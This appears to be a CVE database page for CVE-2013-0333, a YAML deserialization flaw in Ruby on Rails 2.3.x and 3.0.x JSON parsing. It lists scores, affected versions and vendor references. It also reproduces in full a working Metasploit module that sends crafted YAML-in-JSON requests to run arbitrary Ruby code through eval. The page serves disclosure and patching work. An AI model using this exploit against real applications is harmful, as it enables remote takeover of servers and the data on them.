Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
lib/active_support/json/backends/yaml.rb in Ruby on Rails 2.3.x before 2.3.16 and 3.0.x before 3.0.20 does not properly convert JSON data to YAML data for processing by a YAML parser, which allows remote attackers to execute arbitrary code, conduct SQL injection attacks, or bypass authentication via crafted data that triggers unsafe decoding, a different vulnerability than CVE-2013-0156.
CVE Informations
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 24434
Publication date : 2013-01-28 23h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Ruby on Rails JSON Processor YAML Deserialization Code Execution',
'Description' => %q{
This module exploits a remote code execution vulnerability in the
JSON request processor of the Ruby on Rails application framework.
This vulnerability allows an attacker to instantiate a remote object,
which in turn can be used to execute any ruby code remotely in the
context of the application. This vulnerability is very similar to
CVE-2013-0156.
This module has been tested successfully on RoR 3.0.9, 3.0.19, and
2.3.15.
The technique used by this module requires the target to be running a
fairly recent version of Ruby 1.9 (since 2011 or so). Applications
using Ruby 1.8 may still be exploitable using the init_with() method,
but this has not been demonstrated.
},
'Author' =>
[
'jjarmoc', # Initial module based on cve-2013-0156, testing help
'egypt', # Module
'lian', # Identified the RouteSet::NamedRouteCollection vector
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-0333'],
],
'Platform' => 'ruby',
'Arch' => ARCH_RUBY,
'Privileged' => false,
'Targets' => [ ['Automatic', {} ] ],
'DisclosureDate' => 'Jan 28 2013',
'DefaultOptions' => { "PrependFork" => true },
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"])
], self.class)
end
#
# Create the YAML document that will be embedded into the JSON
#
def build_yaml_rails2
code = Rex::Text.encode_base64(payload.encoded)
yaml =
"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
"'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
"eval(%[#{code}].unpack(%[m0])[0]);' " +
": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n " +
":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " +
":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n"
yaml.gsub(':', '\u003a')
end
#
# Create the YAML document that will be embedded into the JSON
#
def build_yaml_rails3
code = Rex::Text.encode_base64(payload.encoded)
yaml =
"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
"'#{Rex::Text.rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " +
": !ruby/object:OpenStruct\n table:\n :defaults: {}\n"
yaml.gsub(':', '\u003a')
end
def build_request(v)
case v
when 2; build_yaml_rails2
when 3; build_yaml_rails3
end
end
#
# Send the actual request
#
def exploit
[2, 3].each do |ver|
print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...")
send_request_cgi({
'uri' => normalize_uri(target_uri.path),
'method' => datastore['HTTP_METHOD'],
'ctype' => 'application/json',
'headers' => { 'X-HTTP-Method-Override' => 'get' },
'data' => build_request(ver)
}, 25)
handler
end
end
end
Products Mentioned
Configuraton 0
Rubyonrails>>Rails >> Version 2.3.0
- Rubyonrails>>Rails >> Version 2.3.0 (Open CPE detail)
Rubyonrails>>Rails >> Version 2.3.1
- Rubyonrails>>Rails >> Version 2.3.1 (Open CPE detail)
Rubyonrails>>Rails >> Version 2.3.2
- Rubyonrails>>Rails >> Version 2.3.2 (Open CPE detail)
Rubyonrails>>Rails >> Version 2.3.3
- Rubyonrails>>Rails >> Version 2.3.3 (Open CPE detail)
Rubyonrails>>Rails >> Version 2.3.4
- Rubyonrails>>Rails >> Version 2.3.4 (Open CPE detail)
Rubyonrails>>Rails >> Version 2.3.9
- Rubyonrails>>Rails >> Version 2.3.9 (Open CPE detail)
- Rubyonrails>>Rails >> Version 2.3.9 (Open CPE detail)
- Rubyonrails>>Rails >> Version 2.3.9 (Open CPE detail)
Rubyonrails>>Rails >> Version 2.3.10
- Rubyonrails>>Rails >> Version 2.3.10 (Open CPE detail)
Rubyonrails>>Rails >> Version 2.3.11
- Rubyonrails>>Rails >> Version 2.3.11 (Open CPE detail)
Rubyonrails>>Rails >> Version 2.3.12
- Rubyonrails>>Rails >> Version 2.3.12 (Open CPE detail)
Rubyonrails>>Rails >> Version 2.3.13
- Rubyonrails>>Rails >> Version 2.3.13 (Open CPE detail)
Rubyonrails>>Rails >> Version 2.3.14
- Rubyonrails>>Rails >> Version 2.3.14 (Open CPE detail)
Rubyonrails>>Rails >> Version 2.3.15
- Rubyonrails>>Rails >> Version 2.3.15 (Open CPE detail)
Configuraton 0
Rubyonrails>>Rails >> Version 3.0.0
- Rubyonrails>>Rails >> Version 3.0.0 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.0 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.0 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.0 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.0 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.0 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.0 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.0 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.0 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.0 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.0
- Rubyonrails>>Rails >> Version 3.0.0 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.0
- Rubyonrails>>Rails >> Version 3.0.0 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.0
- Rubyonrails>>Rails >> Version 3.0.0 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.0
- Rubyonrails>>Rails >> Version 3.0.0 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.0
- Rubyonrails>>Rails >> Version 3.0.0 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.0
- Rubyonrails>>Rails >> Version 3.0.0 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.1
- Rubyonrails>>Rails >> Version 3.0.1 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.1 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.1 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.1
- Rubyonrails>>Rails >> Version 3.0.1 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.2
- Rubyonrails>>Rails >> Version 3.0.2 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.2 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.2 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.2
- Rubyonrails>>Rails >> Version 3.0.2 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.3
- Rubyonrails>>Rails >> Version 3.0.3 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.4
- Rubyonrails>>Rails >> Version 3.0.4 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.5
- Rubyonrails>>Rails >> Version 3.0.5 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.5 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.5
- Rubyonrails>>Rails >> Version 3.0.5 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.6
- Rubyonrails>>Rails >> Version 3.0.6 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.6 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.6 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.6
- Rubyonrails>>Rails >> Version 3.0.6 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.6
- Rubyonrails>>Rails >> Version 3.0.6 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.7
- Rubyonrails>>Rails >> Version 3.0.7 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.7 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.7 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.7
- Rubyonrails>>Rails >> Version 3.0.7 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.7
- Rubyonrails>>Rails >> Version 3.0.7 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.8
- Rubyonrails>>Rails >> Version 3.0.8 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.8 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.8 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.8 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.8 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.8
- Rubyonrails>>Rails >> Version 3.0.8 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.8
- Rubyonrails>>Rails >> Version 3.0.8 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.8
- Rubyonrails>>Rails >> Version 3.0.8 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.8
- Rubyonrails>>Rails >> Version 3.0.8 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.9
- Rubyonrails>>Rails >> Version 3.0.9 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.9 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.9 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.9 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.9 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.9 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.9
- Rubyonrails>>Rails >> Version 3.0.9 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.9
- Rubyonrails>>Rails >> Version 3.0.9 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.9
- Rubyonrails>>Rails >> Version 3.0.9 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.9
- Rubyonrails>>Rails >> Version 3.0.9 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.9
- Rubyonrails>>Rails >> Version 3.0.9 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.10
- Rubyonrails>>Rails >> Version 3.0.10 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.10 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.10
- Rubyonrails>>Rails >> Version 3.0.10 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.11
- Rubyonrails>>Rails >> Version 3.0.11 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.12
- Rubyonrails>>Rails >> Version 3.0.12 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.12 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.12
- Rubyonrails>>Rails >> Version 3.0.12 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.13
- Rubyonrails>>Rails >> Version 3.0.13 (Open CPE detail)
- Rubyonrails>>Rails >> Version 3.0.13 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.13
- Rubyonrails>>Rails >> Version 3.0.13 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.14
- Rubyonrails>>Rails >> Version 3.0.14 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.16
- Rubyonrails>>Rails >> Version 3.0.16 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.17
- Rubyonrails>>Rails >> Version 3.0.17 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.18
- Rubyonrails>>Rails >> Version 3.0.18 (Open CPE detail)
Rubyonrails>>Rails >> Version 3.0.19
- Rubyonrails>>Rails >> Version 3.0.19 (Open CPE detail)
Rubyonrails>>Ruby_on_rails >> Version 3.0.4
- Rubyonrails>>Ruby_on_rails >> Version 3.0.4 (Open CPE detail)
- Rubyonrails>>Ruby_on_rails >> Version 3.0.4 (Open CPE detail)
- Rubyonrails>>Ruby_on_rails >> Version 3.0.4 (Open CPE detail)
References
http://lists.apple.com/archives/security-announce/2013/Jun/msg00000.html
Tags : vendor-advisory, x_refsource_APPLE
Tags : vendor-advisory, x_refsource_APPLE
http://lists.apple.com/archives/security-announce/2013/Mar/msg00002.html
Tags : vendor-advisory, x_refsource_APPLE
Tags : vendor-advisory, x_refsource_APPLE
https://groups.google.com/group/rubyonrails-security/msg/52179af76915e518?dmode=source&output=gplain
Tags : mailing-list, x_refsource_MLIST
Tags : mailing-list, x_refsource_MLIST
http://weblog.rubyonrails.org/2013/1/28/Rails-3-0-20-and-2-3-16-have-been-released/
Tags : x_refsource_CONFIRM
Tags : x_refsource_CONFIRM
